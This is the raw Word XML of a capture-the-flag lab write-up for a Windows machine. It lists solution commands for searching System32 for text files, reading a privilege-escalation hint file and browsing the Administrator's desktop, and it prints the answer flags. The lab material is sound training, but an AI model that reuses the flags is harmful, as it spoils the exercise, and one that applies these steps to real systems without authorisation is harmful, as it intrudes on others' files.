            <wp:docPr id="696080779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0779" name="Picture 6" descr="A black background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2EED" w14:textId="45AF6EB0" w:rsidR="00104553" w:rsidRDefault="00104553" w:rsidP="000F4C23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r w:rsidRPr="00104553">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00104553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13ec20e312bd42dba68a5ce68577344b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1788FA54" w14:textId="59D47D37" w:rsidR="00104553" w:rsidRPr="00104553" w:rsidRDefault="00104553" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47D481B8" wp14:editId="267DC4C4">
            <wp:extent cx="4381725" cy="596931"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1851161798" name="Picture 7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1798" name="Picture 7" descr="A black and white photo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1861" w14:textId="77777777" w:rsidR="000F4C23" w:rsidRDefault="000F4C23" w:rsidP="000F4C23">
      <w:r w:rsidRPr="000F4C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4C23">
        <w:t> The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D7ED94" w14:textId="77777777" w:rsidR="000F4C23" w:rsidRPr="000F4C23" w:rsidRDefault="000F4C23" w:rsidP="000F4C23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F4C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B3EC51" w14:textId="77777777" w:rsidR="00104553" w:rsidRDefault="00104553" w:rsidP="00104553">
      <w:r w:rsidRPr="00104553">
        <w:t>we know that the flag files end with .txt. To search for those files, use the following command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FE509D" w14:textId="055A5678" w:rsidR="00104553" w:rsidRPr="00104553" w:rsidRDefault="00104553" w:rsidP="00104553">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00104553">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00104553">
        <w:t xml:space="preserve"> C:\Windows\System32\*.txt /s /b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6CA09B" w14:textId="77777777" w:rsidR="00104553" w:rsidRDefault="00104553" w:rsidP="00104553">
      <w:r w:rsidRPr="00104553">
        <w:t>This command will search for all .txt files within the </w:t>
      </w:r>
      <w:r w:rsidRPr="00104553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System32</w:t>
      </w:r>
      <w:r w:rsidRPr="00104553">
        <w:t> directory and its subdirectories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB05A4C" w14:textId="5E690EE0" w:rsidR="00104553" w:rsidRPr="00104553" w:rsidRDefault="00104553" w:rsidP="00104553">
      <w:r w:rsidRPr="00104553">
        <w:t xml:space="preserve">  /s — search </w:t>
      </w:r>
      <w:r w:rsidRPr="00104553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>subdirectories</w:t>
      </w:r>
      <w:r w:rsidRPr="00104553">
        <w:t xml:space="preserve"> too (recursive).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718505A0" w14:textId="4A0FBFDF" w:rsidR="00104553" w:rsidRPr="00104553" w:rsidRDefault="00104553" w:rsidP="00104553">
      <w:r w:rsidRPr="00104553">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">/b — use </w:t>
      </w:r>
      <w:r w:rsidRPr="00104553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bare format</w:t>
      </w:r>
      <w:r w:rsidRPr="00104553">
        <w:t>: output only full paths (no header, size, dates, or summary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C446AA" w14:textId="01CDD71B" w:rsidR="000F4C23" w:rsidRDefault="00104553" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50C1CAEC" wp14:editId="1200C5C2">
            <wp:extent cx="5943600" cy="2023110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1273233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3842" name="Picture 12732338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18F" w14:textId="77777777" w:rsidR="00104553" w:rsidRDefault="00104553" w:rsidP="000F4C23">
      <w:r w:rsidRPr="00104553">
        <w:t xml:space="preserve">EscalatePrivilageToGetThisFlag.txt. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF0E6F3" w14:textId="77777777" w:rsidR="00104553" w:rsidRDefault="00104553" w:rsidP="000F4C23">
      <w:r w:rsidRPr="00104553">
        <w:t xml:space="preserve">To read its contents, type the following command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5F4104" w14:textId="091B0DE6" w:rsidR="00104553" w:rsidRDefault="00104553" w:rsidP="000F4C23">
      <w:r w:rsidRPr="00104553">
        <w:t>type C:\Windows\System32\drivers\etc\EscaltePrivilageToGetThisFlag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F3A86B" w14:textId="1703A0F8" w:rsidR="00104553" w:rsidRDefault="00104553" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0143078A" wp14:editId="4091F5EB">
            <wp:extent cx="5880402" cy="654084"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1278310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0335" name="Picture 12783103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D4F" w14:textId="4CC11B41" w:rsidR="00104553" w:rsidRDefault="00104553" w:rsidP="000F4C23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00104553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7ced38d5c3d845308a0aeb6c853490a7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F0A34B" w14:textId="0E6ACBB9" w:rsidR="00104553" w:rsidRPr="00104553" w:rsidRDefault="00104553" w:rsidP="000F4C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162A7C" wp14:editId="7DE088B7">
            <wp:extent cx="4343623" cy="774740"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="162512655" name="Picture 10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655" name="Picture 10" descr="A black background with white dot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2B0A" w14:textId="77777777" w:rsidR="000F4C23" w:rsidRDefault="000F4C23" w:rsidP="000F4C23">
      <w:r w:rsidRPr="000F4C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4C23">
        <w:t> Investigate the Administrator directory to find the fourth flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D474664" w14:textId="77777777" w:rsidR="000F4C23" w:rsidRPr="000F4C23" w:rsidRDefault="000F4C23" w:rsidP="000F4C23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F4C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CB1091" w14:textId="5C25ACAA" w:rsidR="000F4C23" w:rsidRDefault="00104553" w:rsidP="000F4C23">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00104553">
        <w:t>we</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00104553">
        <w:t xml:space="preserve"> have already elevated our privileges, let’s navigate to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00104553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00104553">
        <w:t> directory to find the fourth flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383FEBC7" w14:textId="6084D2D7" w:rsidR="00104553" w:rsidRDefault="005733F8" w:rsidP="000F4C23">
      <w:r w:rsidRPr="005733F8">
        <w:t>cd c:\Users\Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310CFD37" w14:textId="2BC080E2" w:rsidR="005733F8" w:rsidRDefault="005733F8" w:rsidP="000F4C23">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005733F8">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6256F177" w14:textId="38650FF4" w:rsidR="005733F8" w:rsidRPr="000F4C23" w:rsidRDefault="005733F8" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1821D4CA" wp14:editId="15AB4F7C">
            <wp:extent cx="5245370" cy="4089610"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="939086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86285" name="Picture 9390862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6462" w14:textId="734251EE" w:rsidR="005733F8" w:rsidRDefault="005733F8">
      <w:r>
        <w:t>Cd Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158A8D90" w14:textId="7C9ED3F6" w:rsidR="005733F8" w:rsidRDefault="005733F8">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703455DE" w14:textId="3F7E57B3" w:rsidR="005733F8" w:rsidRDefault="005733F8">
      <w:r>
        <w:t>Type flag4.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626525A9" w14:textId="2C5FE9D5" w:rsidR="005733F8" w:rsidRDefault="005733F8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="769A5024" wp14:editId="7A9DC7DF">
            <wp:extent cx="3943553" cy="3308520"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2084479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7938" name="Picture 2084479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17E4" w14:textId="77777777" w:rsidR="005733F8" w:rsidRDefault="005733F8"/>
    <w:p w14:paraId="45260A77" w14:textId="5B886036" w:rsidR="005733F8" w:rsidRDefault="005733F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r w:rsidRPr="005733F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005733F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7c6677a618234a89bc1cc6b76ab6758f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B38C0" w14:textId="72A333AD" w:rsidR="005733F8" w:rsidRPr="005733F8" w:rsidRDefault="005733F8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A0267AF" wp14:editId="21FAAA0D">
            <wp:extent cx="4534133" cy="3708591"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1360589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9211" name="Picture 13605892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F8" w:rsidRPr="0057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97923"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="173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2B"/>
    <w:rsid w:val="000F4C23"/>
    <w:rsid w:val="00104553"/>
    <w:rsid w:val="001D392B"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="005733F8"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00712123"/>
    <w:rsid w:val="00745534"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008B1D4C"/>
    <w:rsid w:val="0093026E"/>
    <w:rsid w:val="00C42853"/>
    <w:rsid w:val="00C70CCD"/>
    <w:rsid w:val="00F31D7C"/>
    <w:rsid w:val="00FA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E6DC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4B328CD0-30BA-41ED-9283-BC753C1F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538</Words>
  <Characters>2809</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>93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2025-10-08T04:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-08T07:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>